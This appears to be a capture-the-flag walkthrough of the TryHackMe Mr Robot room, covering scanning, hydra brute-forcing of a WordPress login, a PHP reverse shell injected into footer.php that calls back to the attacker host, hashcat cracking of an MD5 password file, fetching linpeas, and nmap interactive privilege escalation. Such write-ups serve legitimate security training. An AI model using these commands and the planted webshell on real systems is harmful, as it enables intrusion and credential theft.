> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/mr-robot-ctf.md).

# Mr Robot CTF

**Room Link:** <https://tryhackme.com/room/mrrobot>

## Scanning

**Kali**

```
nmap -A $VICTIM
```

<figure><img src="/files/icwy1eNlssR4PHlurPoM" alt=""><figcaption></figcaption></figure>

### Scan all ports

No other ports found.

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

<figure><img src="/files/tpCD5vGO9DSfzaUuW5qg" alt=""><figcaption></figcaption></figure>

### HTTP port 80

This ran for the majority of the time I was working on the box, I found the wordpress and checked robots.txt manually and the scan didn't really find anything of interest.

**Kali**

```
dirb http://$VICTIM:80 /usr/share/wordlists/dirb/big.txt
```

<figure><img src="/files/RTNUJKiiIYE3ETgS8dGv" alt=""><figcaption></figcaption></figure>

#### Key 1

<figure><img src="/files/8DWKGXlSaa0oPVWzaS9E" alt=""><figcaption></figcaption></figure>

**Downloaded fsocity.dic**

<figure><img src="/files/UjxgFsHWPoUweT4AFZDK" alt=""><figcaption></figcaption></figure>

If you refresh the page you'll go to a wordpress site.

<figure><img src="/files/iJlNoHcSSh13VyW3jX5P" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/HvVoGjVGCZSSmjubVbdR" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ozRHjk4ogLGKz6OPCTkX" alt=""><figcaption></figcaption></figure>

Test to see what users exist in wordpress, if the user doesn't exist it will give an error saying the user is invalid.

<figure><img src="/files/B0yBPiSXRPh2W1p3GyBx" alt=""><figcaption></figcaption></figure>

**Kali**

```
hydra -L fsocity.dic -p test  $VICTIM http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10
.10.70.148%2Fwp-admin%2F&testcookie=1:Invalid username" -V -t 30    
```

<figure><img src="/files/HjyY8nqYh00UuYeBHgJR" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/TUwW3f0uM96dPvc8dXvE" alt=""><figcaption></figcaption></figure>

Because there were so many entries in fsocity.dic I tried to reduce it as much as I could by removing duplicates and passwords that I thought would be unlikely.

**Kali**

```
cat fsocity.dic | sort | uniq > new-fsocity.dic
#Remove lines with less than 4 characters
sed -r '/^.{,4}$/d' new-fsocity.dic > new-new-fsocity.dic
#Remove lines with just numbers
awk '! /^[0-9]+$/' new-new-fsocity.dic > nonums.dic 
#Remove lines with more than 11 characters
sed '/^.\{11\}./d' nonums.dic > final.txt
```

**Kali**

```
hydra -L Elliot -P fsocity.dic  $VICTIM http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F
10.10.70.148%2Fwp-admin%2F&testcookie=1:is incorrect." -V -t 30 
```

<figure><img src="/files/oSGugUC4ZSiiYuRxlp4d" alt=""><figcaption></figcaption></figure>

## Reverse Shell

### Reverse Shell Failed Attempt

**revshell.php code**

```
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>
```

**Kali**

```
vi revshell.php
zip revshell.zip revshell.php
nc -lvnp 443
```

<figure><img src="/files/cQgR4BBnaVtkEJJ9gGJp" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/cWhDGyULrrhKellHVFgp" alt=""><figcaption></figcaption></figure>

Connection is made but it isn't stable.

<figure><img src="/files/oihC5zCXDHsFD9TiASm4" alt=""><figcaption></figcaption></figure>

### Reverse Shell&#x20;

wpscan found out that twentyfifeen is installed.

**Kali**

```
wpscan --url http://$VICTIM
```

<figure><img src="/files/oQEHcKY6vPPY01Aw5Lmo" alt=""><figcaption></figcaption></figure>

**Kali**

```
nc -vlnp 443
```

Added the same shell to footer.php which should appear on every page visited. Then I just went back to http\://$VICTIM/join and it worked.

<figure><img src="/files/u4IQbdvcZsvp0VomwRJx" alt=""><figcaption></figcaption></figure>

Get autocomplete

**Victim**

```
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
```

**Victim**

```
cd /home/robot
ls
cat password.raw-md5 
```

<figure><img src="/files/SeDdp6yoXyJVpD98kiRM" alt=""><figcaption></figcaption></figure>

**Kali**

```
hashcat -m 0 password.raw-md5 /usr/share/wordlists/rockyou.txt
hashcat -m 0 password.raw-md5 /usr/share/wordlists/rockyou.txt --show
```

<figure><img src="/files/bLlVTK7Bbmb1xQ4yi14f" alt=""><figcaption></figcaption></figure>

**Victim**

```
su robot
Password: abcdefghijklmnopqrstuvwxyz
```

<figure><img src="/files/Bz98Ivcy0k9AbmQOZz34" alt=""><figcaption></figcaption></figure>

### LinPeas

**Kali**

```
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81
```

**Victim**

```
cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh
```

<figure><img src="/files/eNPIGArgqVT1sz5wL6WN" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

**Victim**

```
/usr/local/bin/nmap --interactive
nmap> !sh
```

<figure><img src="/files/xpWXgn63luNTT9d25Hme" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/lor6IJ3b5x41FFRlVNp3" alt=""><figcaption></figcaption></figure>
